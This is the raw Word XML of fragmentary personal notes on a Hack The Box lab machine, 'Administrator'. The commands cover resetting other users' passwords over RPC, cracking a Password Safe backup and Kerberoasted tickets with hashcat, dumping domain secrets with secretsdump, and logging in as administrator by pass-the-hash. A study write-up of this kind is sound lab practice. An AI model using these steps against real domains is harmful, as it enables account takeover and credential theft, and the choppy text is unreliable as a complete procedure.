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7C060E5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00A69">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>administrator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1CBAAA8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3C2957">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> From the administrator, I learnt how we can </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003C2957">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pwsafe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003C2957">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to check another users and how we can use bloodhound to find more connections.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79859518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00A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A69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300A6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300A69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300A69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300A69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300A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00A69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6DD9274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  <w:r w:rsidR="000672A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000672A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>its</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000672A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> not a website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78971789" w14:textId="020C3FA0" w:rsidR="00843DCE" w:rsidRDefault="00CF5CD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cannot see the box name just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only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE0C5A9" w14:textId="09E723F5" w:rsidR="00CF5CD3" w:rsidRDefault="00CF5CD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 w:rsidR="006E70AD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = where we obtain host name just D</w:t>
      </w:r>
      <w:r w:rsidR="00724941">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C so add /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00724941"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 w:rsidR="00724941">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">/hosts dc </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00724941">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dc.administrator.htb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="46F72D72" w14:textId="1B87AFF8" w:rsidR="00843DCE" w:rsidRDefault="008E6B8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have credentials as box so use it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FF2DF1" w14:textId="0F08F3BC" w:rsidR="000672A2" w:rsidRPr="000672A2" w:rsidRDefault="000672A2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Olivia -p password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2C0133" w14:textId="355BB210" w:rsidR="00147645" w:rsidRPr="000672A2" w:rsidRDefault="00147645" w:rsidP="00147645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Olivia -p password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622E5D7B" w14:textId="3B177296" w:rsidR="000672A2" w:rsidRDefault="00F453D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Olivia -p password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D3A885" w14:textId="7911B319" w:rsidR="000A3F6D" w:rsidRDefault="007E62EF" w:rsidP="00DD5C98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inetpub</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="56AB2D17" w14:textId="1BA8D84E" w:rsidR="00B14C05" w:rsidRDefault="00DD5C9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net user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B68E8B" w14:textId="77777777" w:rsidR="00B14C05" w:rsidRPr="003F2B80" w:rsidRDefault="00B14C05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4DB522C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046EDF28" w14:textId="77777777" w:rsidR="00012042" w:rsidRDefault="00012042" w:rsidP="0001204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terminal cd /opt/bloodhound/ingestors/bloodhound.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C73B3CF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main kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC5E177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/opt/bloodhound/ingestors/bloodhound.py/bloodhound.py </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B67873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/bloodhound/server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBA5179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BLOODHOUND_PORT=8088 docker compose up -d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD44D4C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finished it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA63B3E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hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="00865BA4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://127.0.0.1:8088</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7A3BA32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cat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xxxxxx_groups.json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|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.data[]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEFAD5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| grep ‘”name”:’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D8F0A3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use of bloodhound</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9492D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rpc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michael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 “P@ssw0rd1!” -U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”/”Olivia”%”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password_olivia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 -S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20D295EE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michael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P@ssw0rd1!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CE920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net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rpc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password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benjamin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 “P@ssw0rd1!” -U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”/”michael”%”P@ssw0rd1!”  -S “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>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C58DE2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ftp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benjamin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P@ssw0rd1!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E0E16D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ftp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433519FE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benjamin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="673307CD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backup.psafe3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057512F3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our terminal </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7764B04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backup.psafe3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kracken</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCC1A0A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kracken</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6D0FE7F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mv backup.psafe3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>/hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16420190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</w:p>
    <w:p w14:paraId="7D42B246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hashcat.bin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5200 /hashes/backup.psafe3 /opt/wordlist/rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BE13C8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hashcat.bin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5200 /hashes/backup.psafe3 - -show</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510985F2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tekieromucho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pwsafe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="756467C9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apt install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passwordsafe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="27EE76D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pwsafe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0250FFE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copy all users from it and create txt file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787506F1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password for another file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C985233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users -p password - -no-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bruteforce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3A9648A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edit it into the bloodhound with this new use to located what’s the role of his</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326E8F4E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git clone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targetedkerberoast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="567C6C3D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into it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E51563E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ntpdate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116692EB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python3 targetedkerberoast.py -v -d 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administrator.htb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-U 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emily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 -p ‘password’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377EE674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</w:p>
    <w:p w14:paraId="1A5BB9DF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copy what we obtain and again go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kracken</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4BF66FA9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cd hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48268375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 </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>eee</w:t>
        </w:r>
        <w:r w:rsidRPr="00865BA4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>.krb</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and paste</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088DE9E9" w14:textId="77777777" w:rsidR="00012042" w:rsidRPr="003F2B80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hashcat.bin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hashes/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ethan.krb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/opt/wordlist/rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47535148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hashcat.bin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hashes/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ethan.krb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 -show</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6262157D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the password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limpbizkit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="67DF508C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nxc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smb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limpbizkit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7D21F986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secretsdump.py </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00865BA4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>administrator.htb/ethan@ip</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1B6E94C0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1</w:t>
      </w:r>
      <w:r w:rsidRPr="006F450E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>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> line of the output we obtain the password copy it after :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4D4205" w14:textId="77777777" w:rsidR="00012042" w:rsidRDefault="00012042" w:rsidP="0001204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evil-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winrm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-I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-u administrator -H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psatehash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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59A2A12D" w:rsidR="00843DCE" w:rsidRDefault="0001204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desktop of the administrator we can obtain the root.txt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010B6"/>
    <w:rsid w:val="00012042"/>
    <w:rsid w:val="000672A2"/>
    <w:rsid w:val="000975C5"/>
    <w:rsid w:val="000A3F6D"/>
    <w:rsid w:val="000C3180"/>
    <w:rsid w:val="000F7132"/>
    <w:rsid w:val="00147645"/>
    <w:rsid w:val="00190473"/>
    <w:rsid w:val="001D41AE"/>
    <w:rsid w:val="00255508"/>
    <w:rsid w:val="00266B46"/>
    <w:rsid w:val="002C0092"/>
    <w:rsid w:val="002F12D9"/>
    <w:rsid w:val="00300A69"/>
    <w:rsid w:val="00356378"/>
    <w:rsid w:val="0037420F"/>
    <w:rsid w:val="003C2957"/>
    <w:rsid w:val="003F2B80"/>
    <w:rsid w:val="003F2E2D"/>
    <w:rsid w:val="00427E37"/>
    <w:rsid w:val="004C5011"/>
    <w:rsid w:val="004D4FA8"/>
    <w:rsid w:val="00533E1A"/>
    <w:rsid w:val="005452A2"/>
    <w:rsid w:val="006140A8"/>
    <w:rsid w:val="006B165F"/>
    <w:rsid w:val="006E4FC0"/>
    <w:rsid w:val="006E70AD"/>
    <w:rsid w:val="006F450E"/>
    <w:rsid w:val="00713159"/>
    <w:rsid w:val="00724941"/>
    <w:rsid w:val="007E62EF"/>
    <w:rsid w:val="007F2A55"/>
    <w:rsid w:val="0084321B"/>
    <w:rsid w:val="00843DCE"/>
    <w:rsid w:val="008D327C"/>
    <w:rsid w:val="008E6B80"/>
    <w:rsid w:val="0091788D"/>
    <w:rsid w:val="009F02D3"/>
    <w:rsid w:val="00A07FE3"/>
    <w:rsid w:val="00A311DF"/>
    <w:rsid w:val="00A5666B"/>
    <w:rsid w:val="00A66912"/>
    <w:rsid w:val="00AA5A48"/>
    <w:rsid w:val="00B01AA9"/>
    <w:rsid w:val="00B14C05"/>
    <w:rsid w:val="00BA1AA9"/>
    <w:rsid w:val="00BA3D51"/>
    <w:rsid w:val="00BC6100"/>
    <w:rsid w:val="00CB5385"/>
    <w:rsid w:val="00CE6AFB"/>
    <w:rsid w:val="00CF5CD3"/>
    <w:rsid w:val="00D27271"/>
    <w:rsid w:val="00D35CDB"/>
    <w:rsid w:val="00D83D29"/>
    <w:rsid w:val="00DD5C98"/>
    <w:rsid w:val="00E15AFD"/>
    <w:rsid w:val="00E20DB2"/>
    <w:rsid w:val="00E81105"/>
    <w:rsid w:val="00E86D50"/>
    <w:rsid w:val="00EF589D"/>
    <w:rsid w:val="00F453D3"/>
    <w:rsid w:val="00F578D1"/>
    <w:rsid w:val="00F57C9E"/>
    <w:rsid w:val="00F6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B2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istrator.htb/ethan@ip" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.krb" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1:80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58</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-25T12:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-17T16:43:00Z</dcterms:modified>
</cp:coreProperties>
</file>